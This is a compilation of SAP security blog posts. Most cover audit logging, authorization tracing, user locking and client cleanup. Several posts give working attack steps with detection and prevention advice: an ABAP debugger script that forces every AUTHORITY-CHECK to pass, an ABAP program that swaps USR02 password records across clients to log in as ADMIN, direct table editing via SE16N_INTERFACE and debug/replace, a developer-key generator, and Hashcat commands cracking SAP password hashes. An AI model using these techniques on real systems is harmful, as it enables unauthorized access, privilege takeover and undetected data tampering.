Table logging

Table logging captures all table changes. This blog will answer the following questions:

  • How to activate table logging in general?
  • How to check if for specific table the logging is active?
  • How to check table changes for a specific customizing action?
  • How to check general table change?
  • How to delete table logging?
  • When not to use table logging?

Table logging activation

In RZ11 system parameter Rec/Client determines the table logging for the complete system. Make sure the value is set to ALL.

See also OSS note 2437986 – SCU3 | How to enable logging in the system.

Table logging per table

In transaction SE11 enter the table you want to check and then goto the technical settings. As example table T000:

SE11 technical settings table logging

At the section Data Changes you can see that Log Changes has been activated.

How to view table changes?

The common way to view table changes is via transaction SCU3. At the start screen press the button analyze logs:

In the next selection screen enter the table to analyze. In this example we analyze table T000:

T000 table changes

Make sure to set the radio button to Tables. Output of the changes to table T000 then looks as follows:

T000 table changes output

Here you can see changes done by user ILLEGALUSER. At which date and time they were done, and the old and new value.

Checking table changes from customizing

If you are in a customizing action and you want to see who did perform changes, select the menu Utilities and then option Change Log. Select date and time frame to analyze and press Execute. As example here changes to Plant Definition (table T001W):

T001w changes

Custom tables and standard SAP tables

By default a lot of SAP configuration and important setting tables have the log changes activated. But not all. It is not uncommon to activate table logging for standard SAP configuration tables important for your business. For important custom configuration Z tables you might want to activate table logging.

Table logging is not a replacement for change documents. Standard SAP generates change documents for changes to documents that must be kept for tracking and audit purposes. This is common for all major transnational objects and its underlying tables. That is why for example for an important table like VBAK (sales order header) the table logging is off: change documents are already generated.

It is very bad practice to make use of table logging for business data reasons. Table logging is used for recording changes to configuration and if all theses logs are deleted there should be no business impact.

Deletion of table logging

Table logging can be deleted with transaction SLG2.

Make sure only very limited amount of people have access to SLG2 and the below program SBAL_DELETE.

Direct table hacking

Changing directly data on an SAP table is the IT admin and IT auditors worst nightmare. This blog will show you the ways it can be done.

Questions that will be answered in this blog are:

  • How can I directly edit tables?
  • How can I prevent direct table editing?
  • How can I detect direct table editing?

Direct table editing method 1: function module SE16N_INTERFACE

This method is available in the SAP S4HANA system. Start with transaction SE37 and key in function module SE16N_INTERFACE. Now press the test button. In this demo we will change dates for sales order table VBAK. In the SE37 test screen enter table VBAK and very important put X in the I_EDIT and I_SAPEDIT fields.

Now hit execute and voila: you are in direct edit mode:

Now we change a few values (date to the year 2027…) and press save:

Data is changed.

Detection of this method: audit logging. In audit logging you can see the user started SE37 and then used report RS_TEST_FRAME_CALL, but you cannot see which module was done, neither is the data change logged.

Prevention of this method:

  1. Debug/replace is needed to change the data: don’t hand out debug/replace.
  2. Deny access to this function module.

Direct table editing method 2: debug/replace

Start transaction SE16 and show the data of the table to edit. Example in this case VBAK data:

Now select a line and put /h for debugging in the command line input. Press enter and the debug screen will open. Double click on the SY-UCOMM field:

In the variables screen now change the value ENTR (for the enter command you gave) to value AEN2 (command to change). Make sure the value is accepted. Now hit F8 to continue. And voila: edit mode:

Change the values (dates in this example) and press save:

How to detect this method: in the SAP audit log (activation of audit log is explained in this blog) show the change in debug/replace mode:

Prevention of this method: don’t hand out debug/replace rights.

STAUTHTRACE: improved authorization trace

If you are still using the old classic ST01 authorization trace, do keep on reading and you will want to switch to the new STAUTHTRACE improved authorization trace.

Questions that will be answered in this blog are:

  • How to run the new STAUTHTRACE tool?
  • What are the major improvements in STAUTHTRACE tool?

Running new STAUTHTRACE tool

To run the new tool start transaction STAUTHTRACE. If the tcode is too complex, add it as favorite to your start screen.

From the start screen you see the immediate benefits. You can start the authorization trace for:

  • All application servers in one go (this is highly useful in an authorization issue with RFC users or background users where you have no control on which application server it will run): just record on all servers
  • Specific user only, but errors only: this will reduce your logging footprint to errors only
  • Filter the results to not show duplicate entries

Results

The result screen from STAUTHTRACE is similar to ST01 trace

But the result is more comprehensive, since it can take errors only, with duplicates filtered and take data from all application servers. This make the result complete and more easy to catch authorization issues.

Background

The background and all feature of STAUTHTRACE are kept in SAP OSS note 2577291 – How to get trace of authorization checks using transaction STAUTHTRACE.

ABAP developer keys and object keys hack

A lot of basis and ABAP people feel protected by the ABAP keys and object keys for standard SAP changes. They have to be called off at SAP marketplace keys section.

Let me already give away the clue: since quite some time there is a KeyGen for ABAP and object keys. The protection is gone.

This blog will answer following questions:

  • Where can I download the ABAP keygen?
  • How to run the ABAP keygen?
  • How should I protect my system from unwanted ABAP changes?
  • S4HANA does not use developer keys and object keys any more, how should I protect my S4HANA system from unwanted ABAP changes?

Where can I download the ABAP keygen?

Google for SAP IWR Object key generator. Or click here for a copy:

Upon download: rename the file to .zip and unzip it.

Running ABAP keygen

Running the executable is simple. But you need to run it in Windows 7 compatibility mode.

Keygen screen

Fill out the data and hit generate…. that’s all.

The use of this tool is at your own risk. Most admins don't like you to use this tool at all.

The whole idea of this blog is to show not to rely on the developer key procedure.

How should I protect developments?

The best way to protect your development is to carefully grant the S_DEVELOP privilege. Only give it to the right people and only give it to develop Z* range of code.

S4HANA developer key

The title is a bit misleading. In S4HANA there are no developer keys and object keys any more.

Background of this change be SAP can be found in OSS note: 2309060 – The SSCR license key procedure is not supported in SAP S/4 HANA.

So in S4HANA, you must set up authorizations for S_DEVELOP properly.

With S_DEVELOP you have to set create/change rights for the packages and or objects. For custom code only hand out Z* privileges.

If you hand out a * for the objects or classes, then the developer can also change standard SAP.


Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:

RSUSR003

Now we start the debugger with /h and goto the scripting tab:

Script page

In the coding block of the script load this block of coding:

 *<SCRIPT:PERSISTENT>


*<SCRIPT:HEADER>
*<SCRIPTNAME>ZBYPASS</SCRIPTNAME>
*<SCRIPT_CLASS>LCL_DEBUGGER_SCRIPT</SCRIPT_CLASS>
*<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>
*<BP_REACHED>X</BP_REACHED>

*</SCRIPT:HEADER>

*<SCRIPT:PRESETTINGS>
*<BP>
*<FLAGACTIVE>X</FLAGACTIVE>
*<KIND>1 </KIND>
*<STATEMENTSTA>AUTHORITY-CHECK</STATEMENTSTA>
*</BP>

*</SCRIPT:PRESETTINGS>

*<SCRIPT:SCRIPT_CLASS>
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

  PUBLIC SECTION.
    METHODS: prologue  REDEFINITION,
      init    REDEFINITION,
      script  REDEFINITION,
      end     REDEFINITION.

ENDCLASS.                    "lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script IMPLEMENTATION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script IMPLEMENTATION.
  METHOD prologue.
*** generate abap_source (source handler for ABAP)
    super->prologue( ).
  ENDMETHOD.                    "prolog

  METHOD init.
*** insert your initialization code here
  ENDMETHOD.                    "init
  METHOD script.

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

*************************************************
* debugger commands (p_command):
* Step into(F5)   -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_INTO
* Execute(F6)     -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OVER
* Return(F7)      -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OUT
* Continue(F8)    -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_CONTINUE
*************************************************
****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DEBUGGER_CTRL / METHOD = DEBUG_STEP )
*Importing
*        REFERENCE( P_COMMAND ) TYPE I
****************************************************************

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_ABAPDESCR / METHOD = LINE )
*Returning
*        VALUE( P_LINE ) TYPE I
****************************************************************

    TRY.
        CALL METHOD abap_source->line
          RECEIVING
            p_line = DATA(p_line).
      CATCH cx_tpda_src_info .
      CATCH cx_tpda_src_descr_invalidated .
    ENDTRY.

    TRY.
        CALL METHOD debugger_controller->debug_step
          EXPORTING
            p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
      CATCH cx_tpda_scr_rtctrl_status .
      CATCH cx_tpda_scr_rtctrl .
    ENDTRY.


****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

    TRY.
        CALL METHOD cl_tpda_script_data_descr=>change_value
          EXPORTING
            p_new_value = '0'
*           p_offset    = -1
*           p_length    = -1
            p_varname   = 'sy-subrc'.
      CATCH cx_tpda_varname .
      CATCH cx_tpda_scr_auth .
    ENDTRY.

  ENDMETHOD.                    "script
  METHOD end.
*** insert your code which shall be executed at the end of the scripting (before trace is saved)
*** here

  ENDMETHOD.                    "end
ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION
*</SCRIPT:SCRIPT_CLASS>

*</SCRIPT:PERSISTENT>

Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:

Breakpoint

Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more then fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care: the coding of the script simple changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.

Prevention

If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.

SAP security baseline template

This blog will explain the use of SAP security baseline template.

Questions that will be answered in this blog are:

  • Where to find the SAP security baseline template?
  • What does the SAP security baseline template cover?
  • How can I use the SAP security baseline template?

The SAP security baseline template

Background information and the current download link to the SAP security baseline template can be found in OSS note 2253549 – The SAP Security Baseline Template. Or using following path: https://support.sap.com/sos → Media Library → SAP Security Baseline Template.

The content

The security baseline template contains a large 150 page word document from SAP covering all the topics of the SAP secure operations roadmap:

SAP security baseline template Secure Operations Roadmap

For each topic SAP will give must do actions, recommendations, tips and best practices.

This makes the SAP security baseline document a good document for:

  1. Starting security set up for a new greenfield implementation
  2. As as check list for existing implementations

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

  • How to execute a cross client access hack?
  • How to detect this attack?
  • What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (most easy is standard users: see blog on this topic). Some basis and security people will waive this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored into a different client”.

So what the hacker will do is simple open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the source client hacked a new user will be created. Let’s say the user ADMIN, which is also existing in the target client. The hacker creates the user ans sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

  • Client opening and closing in the source client
  • The presence of the ABAP code
  • The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t read this blog how to do it and execute it!)
  • ADMIN access from same terminal as the hacker is using to logon to the source client

Preventive measures

The following preventive measures can be taken:

  • Reset all standard passwords in all systems in all clients (see blog)
  • Delete no longer needed clients 001 and 066 (see blog)
  • Switch on audit logging in all clients (see blog)

Mass locking and end validity date of users

There are 2 good reasons for mass locking and ending validity date of user: security and licenses.

Questions that will be answered in this blog are:

  • How can I mass lock users automatically if they have not logged on for a certain time?
  • How can I mass set the validity date of the users that did not log on for a certain time?

Automatic lock of user after expired logon

In RZ11 you can set parameter login/password_max_idle_productive with an amount in days.

Password max idle initial

If the user (including yourself) did not logon to the system after this amount of days the password is still valid, but it does not allow you to logon.

If the user tries to logon after the period he will see this error message and cannot continue:

Password deactivated

In SU01 such a user looks like this:

Password expired

If you also want to automatically lock users after you give them a new password, use the parameter login/password_max_idle_initial.

Initial passwords is one of the nice ways of entering a system as hacker. Especially if the initial password used by the admin is more or less the same (like Welcome_1234!). Countermeasure: instruct your admins to use the Password Generator. This will generate long random once off password.

Mass setting of user validity date

For user measurement and security reasons you want to limit the validity period as well. Users who are locked still count for user measurement (see blog on license measurement tips & tricks). Users locked and unlocked by some method can be security threat.

Standard SAP program RSUSR_LOCK_USERS (built on top of program RSUSR200) is the tool to achieve this.

It has quite a long selection screen:

RSUSR_LOCK_USERS screen 1

On the first block set the dates for last logon and password change to get a good selection of users.

RSUSR_LOCK_USERS screen 2

On the second block very important to only select Dialog Users.

First run with Test Selection to get a list. If you are happy with the list, run it with Set End Of Validity Period.

Performance and bug notes (OSS search hints RSUSR200 and RSUSR_LOCK_USERS): 
2615606 - SUIM | Search for users with incorrect logon does not work
2628060 - SUIM | RS USR200: Poor performance

 

Client 001 and 066 deletion

Questions that will be answered in this blog:

  • Why delete clients 001 and 066?
  • How to delete clients 001 and 066?
  • How to test the deletion before executing in a productive environment?

Why delete clients 001 and 066?

The clients 001 and 066 had a purpose in the past and do not have them any more.

The only thing they do now is pose a security threat. Access can be gained to these clients, for example via standard SAP users, and from these client you could take over the system.

Also unwanted batch jobs might be still running from these clients consuming resources.

How to execute client 001 and 066 deletion?

You can delete client 001 and 066 according to the instructions in SAP note 1749142 and on the respective blog “How to remove unused clients including client 001 and 066” on SCN.

Testing the deletion

The deletion can be tested on a development and QA system before it is done on productive system. If really in doubt copy the productive system to a different system and perform the deletion there first as a test.

SAP password hash hacking Part IV: rule based attack

This blog series will explain the process of hacking SAP password hashes: also know as SAP password hacking. The process of hacking will be explained and appropriate countermeasures will be explained.

In this fourth blog we will continue with more complex attacks on the SAP password hashes and will also explain more preventive measures.

 

For the first blog on attacking the SAP BCODE hash click here.

For the second blog on attacking the SAP PASSCODE has click here.

For the third blog on attacking the SAP PWDSALTEDHASH has click here.

 

Questions that will be answered in this blog are:

  • How does the rule based attack work?
  • How to use the rules on found passwords?
  • Where to find good rule books?

The rule based attack

The dictionary rule book attack is using the dictionary as input and then applies rules to the dictionary to generate a new password candidate.

Example words we will use are Password and Welcome.

Examples of apply some rules:

  • Replace a with @ will give P@ssword
  • Replace o with 0 will give Passw0rd and Welc0me
  • Replace s with $ will give Pa$$word
  • Replace l with ! will give We!come
  • All rules above combined will give P@$$w0rd and We!c0me

For full list of possible rule syntax see Hashcat site on rule-based attack.

Suppose we have guessed one correct password for one user. He made the password Welcome1!.

Now we will construct some rules:

  1. Replace e with 3, rule will be se3
  2. Replace l with 1 and l with !, rules will be sl1 and sl!
  3. Replace o with 0, rule will be so0

We use these 3 hashes as input:

{x-issha, 1024}riqL3PXHJMOKkofOv1I4ObteIEGKw/OMny0U8MzMZ04=
{x-issha, 1024}7SC51LKZChMcpwmixb/ca/+qYvDxsXTbR3mE0IPrsaU=
{x-issha, 1024}AxErKhue0RAUveCTBgpAiJIaSDWGKdjpooiDSn5sTtg=

We construct an input file with word Welcome1! and a file with these rules:

se3

sl!

sl1

so0

Now we call Hashcat with the rule based attack mode:

hashcat64 -a 0 -m 10300 -p : --session=all -o "C:\hashes_found.txt" --outfile-format=3 -n 32 --gpu-temp-abort=80 -r "C:\simplerules.txt" "C:\hashes.txt" "C:\welcome.txt"

Great: 2 catches out of 3:

{x-issha, 1024}riqL3PXHJMOKkofOv1I4ObteIEGKw/OMny0U8MzMZ04=:We1come1!
{x-issha, 1024}AxErKhue0RAUveCTBgpAiJIaSDWGKdjpooiDSn5sTtg=:Welc0me1!

Now let’s add these rules:

o03
o13
o23

This means replace first character with digit 3, repeat for second and third.

We run again Hashcat and find the 3rd one:

{x-issha, 1024}7SC51LKZChMcpwmixb/ca/+qYvDxsXTbR3mE0IPrsaU=:W3lcome1!

What has happened here? Why is this found now, and not before with the se3 rule, which should substitute the e with 3? Pretty simple: replace e with 3 in word Welcome1! will give W3lcom31!. So it replaces all and not first one. This is there background of having many rules.

Huge rulesets

With the Hashcat download you get a special directory called rules. Here there are some big rulesets available.

The nicest one is the RockYou list of rules. This is constructed based on the RockYou password list hacked in 2009 where 32 million passwords leaked. Based on English dictionary somebody has constructed the rules to come to most of these passwords.

Effectiveness of the attack

The effectiveness of the rulebased attack is quite high. If you have found 1 password, you just run the complete ruleset of one of the huge lists to find multiple variations. People are not so inventive and creative. You will be surprised on the amount of password variations you find on the following words:

  • Welcome
  • Summer
  • Winter
  • Password
  • Apple
  • Android
  • Google

Hackers don’t start with the full dictionary. They start with the top 1000 words and apply many rules to them. From the passwords found they will start to derive patterns of the users. Any new password is processed through many new rules to generate candidates with higher potential.

The name and or abbreviation of a company is word number 1 to add to the favorite word list.

Prevention measure 1: frequent change and large change per time

Many companies have implemented a more faster cycle of password changes. In the past once per year was common. Nowadays 60 to 90 days is more common practice. Set this in profile parameter: login/password_expiration_time.

More important is to make a larger change per time the password changes. This is to avoid the rule-attacks explained above to become very effective. How many people just simply change and increase single digit in password? Or increase the special with the next one on the keyboard. Set the profile parameter login/min_password_diff to sufficiently high value of 3 or more.

Prevention measure 2: length

Explain to your users that length is more important than complexity by using this famous explanation:

correct horse battery staple